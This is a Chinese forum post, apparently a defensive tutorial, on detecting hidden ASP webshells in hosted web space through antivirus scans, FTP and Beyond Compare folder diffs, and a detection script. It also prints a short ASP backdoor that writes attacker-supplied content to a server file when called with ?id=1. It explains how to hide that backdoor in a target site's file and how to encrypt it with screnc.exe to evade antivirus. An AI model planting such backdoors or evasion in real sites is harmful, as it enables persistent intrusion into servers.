TA的每日心情 | 开心
2014-7-28 21:47 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。
, `2 m" ?* c$ S! W8 U% h/ N' L8 M
通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。 * Q: j5 n& \* _' U# ?- S
1 e6 x ?0 J* V
一.技巧1:杀毒软件查杀 % `& p5 K+ a1 w; n1 b& d4 h4 Z e+ P3 t
7 T9 M7 m* l# I1 v! n: A
一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。
, R# {; @) `6 V% v. T, l$ O6 \3 A9 M5 u
利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。
( ]" D; v& R+ p3 M$ W
3 p+ T" H0 @& ^' G5 e& ?- o二.技巧2:FTP客户端对比 & B7 F4 _% F3 U3 m
5 k4 V; J) F4 P" P# E( X1 r
上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入: & p- e# P/ J8 G; |4 f: N8 m
K5 K2 ^' }) V) f- |( Q
screnc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。
$ ]: P9 ]8 A, @9 i3 k M% _4 [- Y1 M/ I+ i" Q; d2 k9 I: P [
经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉 % |$ C( b; F! a( j; D, ^
0 R" Z2 x3 M+ |$ u7 L9 l
等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。
. o# \, S: o5 G
U d( \& V- A7 ]$ ?盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。
; i" w4 f7 t9 o0 P7 r0 a' Q- ?# ?( f/ S
所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。
# w0 R; D9 W; p+ u
2 B# `; @* G' c4 o" H7 z! c1 P2 n这里以FlashFXP进行操作讲解。 ' f8 N2 Z" k& ?* B( O' I9 a/ v
# n3 h* n! z6 e0 F
步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。 . J5 c, |2 |$ U4 F x+ s
" _3 w& y/ d- p# R4 Y
步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。 ) J R/ b4 a' i. ]
2 t- B r& f) Q- G4 _' x4 {% d; T我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。
/ x3 O0 L% t3 Q三.技巧3:用Beyond Compare 2进行对比
7 ]7 @4 s E; k( h
7 R. D* k0 C1 n! F3 D) U6 O" B% d上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下:
0 o, g" F: j5 m0 @* k) N3 t7 c [( R) ]0 I+ _6 O' r" f: ~( A. c
〈% Z+ w) A6 ]5 s
9 h& [2 E, H# Non error resume next 9 t3 i" B) u2 K7 I) w
9 g& g: g5 T8 B1 ]7 [! C
id=request("id") ; r; r, N8 o8 B7 r, i# v4 `& k8 F
$ b* G3 h3 l+ h' H& I. D
if request("id")=1 then
8 J; f. b5 q4 [/ y5 ?' z# a, U) M0 m" _2 ^' [8 Q2 L7 G& u0 h
testfile=Request.form("name")
0 ]; d! c4 Y O" F! s; D( E
9 f: u" {8 m% }msg=Request.form("message")
8 G) b; [, y! C! t+ A
& {: @& I! z, }- g# U# H0 |. Kset fs=server.CreatObject("scripting.filesystemobject") : G: v' V4 G9 D0 b# n! N3 ~
1 o1 f% r: G& Q
set thisfile=fs.openTestFile(testfile,8,True,0) * C1 N" l( `) N& L, j
4 }7 ?4 R# W* p- Q/ Uthisfile.Writeline(""&msg&"") 9 {9 s7 R9 T. k/ J& i3 p% W' L3 J
* ?( G* ?/ }( H9 I9 K; C# Fthisfile.close
& H' }* s( Z& \& t- b6 M$ a# P2 M c( b
set fs=nothing 9 D# S2 t- O ]. p' \
1 g! H1 P) H( [' s
%〉
# K3 {9 N) R& d" |' n/ }
+ p) m% Z1 ^& _1 G7 {; ~# X3 E〈from method="post" Action="保存"?id=1〉
5 b5 u+ M0 k4 ]4 X# H# B7 o- q% S# S" W
〈input type="text" size="20" name="Name"
/ J" L) i! Z% E4 y, o6 P7 t
# W$ Z$ n+ Q' |6 ]* YValue=〈%=server.mappath("XP.ASP")%〉〉
2 b+ E+ K3 Q" Z2 {" \4 S4 L
* N+ p% L0 B0 F〈textarea name="Message" class=input〉 + ?6 l" x' V; g4 s3 ?" g U: S
( N# o* P1 y4 g2 v, p
/ {: o8 n3 o# C$ ]〈/textarea〉
. u( L3 T- S( Q4 Q0 [* j) }4 ?+ m, I' X: T4 G
〈input type="Submit" name="send" Value="生成" ' g9 _2 [' Q X( x7 L
( E/ K. M4 S; Wclass=input〉 + Y* q# I0 N0 u5 K) ~2 j
3 b- O' L* W" @8 q
〈/from〉 . }8 u# w2 P5 M( F/ k
- I/ x* m: a, g; k+ v9 ?
〈%end if%〉
- u9 Z- j8 z3 B c$ H9 C6 c: h8 c, A
注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。
6 A' g3 @0 d2 [2 v1 m
; o; f- B5 l$ S假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。 2 A6 E5 _* A" ?$ f7 G+ F# ^
. j2 @* \) L1 P1 J
这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。
& X3 a7 w" T \! B) }9 R
J' S1 k; h `7 b( a+ NBeyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。; }: x3 I$ ~% Z
- {" s7 S+ k' \2 T/ f1 _1 c看我来利用它完成渗透性asp木马的查找。 2 D* r K2 G c- @! e2 k& r
, `) j+ }6 k x. b. a( c步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。 " g& x" R' x, ~1 G9 s3 z; H8 u5 `
3 P+ a* X& S) `% L" K j步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。
. `: {/ g. r. _0 A/ X
" B( I/ F' {+ [# I步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧!
# u; v* S5 k/ B" D% ~5 h8 U: J7 R2 f' k# C( ~+ x# Z
& n0 c7 @: z! V5 N. \2 g四.技巧4:利用组件性能找asp木马 ; R) O! u- o3 g/ ~" A
' {+ m* V5 X6 ]. H! t上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。 & T n' V) e# ^, i+ P4 S% ?( L
, M6 q/ k6 L3 b# k- _. f如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。
+ I, z& r: L/ S: D2 {
: Z% r, u, f: n8 d0 u它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。
' C$ E; J8 ~% p% F: D9 d4 o4 h7 H4 i
使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。 & k/ d7 O9 C( N$ N1 p9 L+ H
1 j. n5 W8 {$ {; ?+ S8 I R4 l' E
一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。
" B, i. Y3 [6 F/ D4 Q1 X: Y
, P; |; }5 G" X: S大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。 |
|
/1 
IP卡
狗仔卡
发表于 2009-4-17 08:32:46
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
楼主